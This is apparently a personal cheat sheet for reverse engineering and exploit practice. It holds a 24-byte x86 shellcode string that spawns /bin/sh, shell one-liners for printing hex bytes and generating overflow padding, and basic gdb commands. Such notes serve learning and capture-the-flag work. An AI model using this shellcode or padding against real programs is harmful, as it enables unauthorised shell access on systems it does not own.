____ ____ _  _ ____ ____ ____ _ _  _ ____ 
|__/ |___ |  | |___ |__/ [__  | |\ | | __ 
|  \ |___  \/  |___ |  \ ___] | | \| |__]

____ _  _ ___  _    ____ _ ___ ____ 
|___  \/  |__] |    |  | |  |  [__  
|___ _/\_ |    |___ |__| |  |  ___] 

#86 shellcode sh? bash?
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80
_  _ ___ _ _    ____ 
|  |  |  | |    [__  
|__|  |  | |___ ___] 

#echo hex
echo -e "\xef\xbe\xad\xde"

#print hex using python
python -c 'print "\xef\xbe\xad\xde"'

#generate data with python
$(python -c 'print "A" * 140')

#find length of shell code
python -c 'print len("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80")'
output: 24
____ ___  ___  
| __ |  \ |__] 
|__] |__/ |__] 

#gdb init file
put commands in ~/.gdbinit

#set gdb to intel syntax
set disassembly-flavor intel

#print 15 instructions from main
x/15i main

$print string at address
x/1s 0xFFFFF
